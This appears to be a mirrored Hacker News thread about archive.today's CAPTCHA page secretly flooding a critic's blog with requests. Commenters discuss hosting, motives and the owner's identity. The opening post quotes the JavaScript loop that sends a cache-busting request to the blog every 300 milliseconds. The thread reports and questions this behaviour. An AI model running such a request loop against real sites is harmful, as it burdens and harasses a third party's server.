Ask HN: Weird archive.today behavior?

submitted by rabino+(OP) on 2026-01-14 22:30:40 | 140 points 69 comments
[source] [go to bottom]

archive.today has recently (I noticed this, like, 3 days ago) started automatically making requests to someone's personal blog on their CAPTCHA page. Here's a screenshot of what I'm talking about: https://files.catbox.moe/20jsle.png

The relevant JS is:

   setInterval(function() {
     fetch("https://gyrovague.com/?s=" + Math.round(new Date().getTime() % 10000000), {
       referrerPolicy: "no-referrer",
       mode: "no-cors"
     });
   }, 300);

Looking at this blog, there seems to be exactly one article mentioning archive.today - "archive.today: On the trail of the mysterious guerrilla archivist of the Internet" (https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...), where the person running the blog digs up some information about archive's owner.

So perhaps this is some kind of revenge/DOS attack attempt/deliberately wasting their bandwidth in response to this article? Maybe an attempt to silence them and force to delete their article? But if it is, then I have so many questions. Like, why would the owner of the archive do that 2.5 years after the article was published? Or why would they even do that in the first place, do they not know about Streisand effect?

I'm confused.

NOTE: showing posts with links only show all posts

>>rabino+(OP)
Hmm. If it is an attempt at DDoS attacks, it's probably not very fruitful:

  >$ resolvectl query gyrovague.com

  gyrovague.com: 192.0.78.25                     -- link: eno1
                 192.0.78.24                     -- link: eno1

Viewing the first IP address on https://bgp.he.net/ip/192.0.78.25 shows AS2635 (https://bgp.he.net/AS2635) is announcing 192.0.78.0/24. AS2635 is owned by https://automattic.com aka wordpress.com. I assume that for a managed environment at their scale, this is just another Wednesday for them.

>>intern+AV
It's not just for paywall bypassing. Sometimes there are archive.today snapshots that aren't in the Wayback Machine (though I think your overall point about lawlessness still stands).

For example, there was some NASA debris that hit a guy's house in Florida and it was in the news. [1] Some news sites linked to a Twitter post he made with the images but he later deleted the post. [2]

The Wayback Machine has a ton of snapshots of the Twitter post but none of them render for me. [3]

But archive.today's snapshot works great. [4]

[1] https://www.bbc.com/news/articles/c9www02e49zo

[2] https://xcancel.com/Alejandro0tero/status/176872903149342722...

[3] https://web.archive.org/web/20240715000000*/https://twitter....

[4] https://archive.md/obuWr

>>rabino+(OP)
>>45922875

“Behind the complaints: Our investigation into the suspicious pressure on Archive.today”

>>eli+IX
"It’s a testament to their persistence that they’re managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee."

https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...

And one where the author's cool with whoever is running archive.today.

>>catlif+BV
Add https://bgp.tools to the list

>>Brybry+MX
Archive.today has a different approach to the baseline archive technology (executing javascript at archival time and saving the DOM instead of saving and replaying server responses verbatim). Additionally, Archive.today employs a number of site specific mitigations which aren't visible to the end user. In some cases, for instance, they use accounts, but then retroactively modify the DOM to mask this mitigation. [0] While the exact strategy they use for Twitter isn't known to me, they are doing something by their own admission. [1]

[0] https://blog.archive.today/post/708008224368001024/why-isnt-... compounded with personal observation.

[1] https://blog.archive.today/post/708565142782246912/pretty-pl...

>>rabino+(OP)
What my pattern-matching eyes immediately spotted is that the hn username that posted this is rabinovich. The linked article speaks about Masha Rabinovich. Maybe a coincidence.

> in a 2012 F-Secure forum post, a “masharabinovich” complains about “my website http://archive.is/” being blacklisted. They pop up on Wikipedia as well getting told off for adding too many links to archive.is, including a mention that they’re using the Czech ISP fiber.cz

>>rabino+(OP)
Gyrovague here, author of the targeted blog post:

https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...

In the past week or so, I have received a GDPR takedown attempt of the archive.today blog post (which my hosting provider rightly rejected), a politely worded request to take it down (which was sadly eaten by my spam filter), and now this (thanks to the HN reader who tipped me off).

Given that the proverbial cat has been out of the bag for 2.5 years at this point, I'm genuinely puzzled as to what they're hoping to achieve, but this does not seem like a very good way of going about it.

>>rabino+(OP)
This feels like the start of treasure hunt like game. Between username of rabinovich (as others have pointed out) and the prior submission by rabinovich of an archive.today like tool 3 months ago - https://ghostarchive.org/. When you click into the search query examples for ghostarchive such as this one https://ghostarchive.org/search?term=https://docs.google.com. Many of the documents are very weird indeed.

>>rabino+(OP)
DDosing but still archiving:

https://archive.is/https://gyrovague.com/2023/08/05/archive-...

>>rabino+(OP)
>>46628734 makes some good points, it shouldn't have been downvoted do death

>>master+Qb1
> They pop up on Wikipedia as well getting told off for adding too many links to archive.is

Funnily enough, they removed that from their talk page right around the time this thread got posted, their first edit in almost 6 years: https://en.wikipedia.org/wiki/Special:Contributions/Masharab...

That's a lot of coincidences...

>>333c+4c1
This post did in fact go through the second-chance pool: https://news.ycombinator.com/pool

(For more details on posts getting “rescued”, see Dan’s comment here: >>11662380 )

>>intern+K91
There are different scenarios and different needs. Trust-wise, the enemy of your enemy may be your friend. Dodging legal liability can be an asset too, if you are dealing with evidence against the government, or powerful people within your jurisdiction. Wikileaks fills a similar role. And archive.org certainly isn't trustworthy with respect to US political influence. They are trying to rewrite history, they will purge the archives, too.

For the average case, you shouldn't fully trust any one service IMO.

BTW, there is a neat browser add-on, which lets you search across various archives: https://github.com/dessant/web-archives

>>fhub+8h1
> This feels like the start of treasure hunt like game. Between username of rabinovich (as others have pointed out) and the prior submission by rabinovich of an archive.today like tool 3 months ago - https://ghostarchive.org/. When you click into the search query examples for ghostarchive such as this one https://ghostarchive.org/search?term=https://docs.google.com. Many of the documents are very weird indeed.

This is what someone trying to start a treasure hunt like game would say....

Mom! Am I an NPC? Mom! Am I real???

>>Brybry+MX
.

   {
   echo resolve web.archive.org:443:207.241.237.3
   echo url=https://web.archive.org/web/20240404223104if_/https://twitter.com/Alejandro0tero/status/1768729031493427225
   echo user-agent=\"\"
   echo header accept:
   } \
   |curl -qK/dev/stdin|tr \< '\n'|sed -n '/^meta/s/^/</;/./{/og:url/,/og:image/p;}'

zlacker

Ask HN: Weird archive.today behavior?